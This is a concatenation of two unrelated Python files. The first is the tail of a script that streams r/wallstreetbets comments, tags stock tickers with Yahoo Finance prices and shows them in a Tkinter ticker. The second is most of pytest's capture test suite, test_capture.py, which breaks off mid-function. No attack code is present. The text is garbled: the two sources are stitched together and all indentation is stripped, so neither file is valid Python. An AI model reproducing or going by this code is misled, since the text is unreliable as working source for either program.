comment_dict['welcome']['original_author'] = ""
comment_dict['welcome']['link'] = "https://old.reddit.com/r/wallstreetbets"
comment_dict['welcome']['created_utc'] = ''
comment_dict['welcome']['body'] = " Welcome to the /r/Wallstreetbets Ticker! Now loading comments and stock prices..... ###"
for comment in reddit.subreddit('wallstreetbets').stream.comments():
if hasattr(comment, 'body') and comment.created_utc > (time.time() -300) and comment.id not in old_comments and comment.link_id in stickies:
old_comments.append(comment.id)
body = comment.body.replace("\r"," ")
body = body.replace("\n"," ")
body = body.strip()
for stock in stocks:
if stock in stock_dict:
if stock in body:
#print("Found stock ticker!")
if stock_dict[stock]['regularMarketChangePercent'] > 0:
body = body.replace(stock, stock + " (" + str(stock_dict[stock]['regularMarketPrice']) + " ⮝" +str(round(stock_dict[stock]['regularMarketChangePercent']*100,2)) + "%" ") ")
else:
body = body.replace(stock, stock + " (" + str(stock_dict[stock]['regularMarketPrice']) + " ⮟" +str(round(stock_dict[stock]['regularMarketChangePercent']*100,2)) + "%" ") ")
comment_dict[comment.id] = {}
comment_dict[comment.id]['author'] = " /u/" + str(comment.author) + ": "
comment_dict[comment.id]['original_author'] = str(comment.author)
comment_dict[comment.id]['author_link'] = "https://old.reddit.com/u/" + str(comment.author)
comment_dict[comment.id]['link'] = comment.link_permalink + comment.id
comment_dict[comment.id]['created_utc'] = comment.created_utc
if len(body) < 500:
comment_dict[comment.id]['body'] = body + " ###"
else:
comment_dict[comment.id]['body'] = body[0:500] + "... blah blah blah ###"
#print("blabber detected!")
#print(body[:10]+"...")
comments_in_queue = len(comment_dict)
#print(comments_in_queue)
def find_all(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1: return
yield start
end = a_str.find(':', start)
yield end
start += len(sub)
def get_stock_prices():
global stock_dict
global stream
while True:
print("#### UPDATING STOCK PRICES")
current = YahooFinancials(stocks)
stock_dict = current.get_stock_price_data()
print("#### DONE UPDATING STOCK PRICES")
time.sleep(600)
get_mods()
if __name__ == '__main__':
threading.Thread(target=check_stickies).start()
threading.Thread(target=get_comments).start()
threading.Thread(target=get_stock_prices).start()
create_ticker(i)
root.mainloop()
|
test_capture.py
|
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import StringIO
from io import UnsupportedOperation
from typing import List
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import ExitCode
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
needsosdup = pytest.mark.skipif(
not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
class TestCaptureManager:
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config.argparsing import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, "dup", raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@pytest.mark.parametrize(
"method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
)
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"*capsys*capfd*same*time*",
"*test_two*",
"*capfd*capsys*same*time*",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile(
"""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
"""
)
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir):
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile) -> None:
flist = [] # type: List[TextIO]
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
bio = io.BytesIO()
f = capture.safe_text_dupfile(bio, "wb")
f.write("hello")
assert bio.getvalue() == b"hello"
assert "BytesIO object" in f.name
def test_dupfile_on_textio():
sio = StringIO()
f = capture.safe_text_dupfile(sio, "wb")
f.write("hello")
assert sio.getvalue() == "hello"
assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, "dup"):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
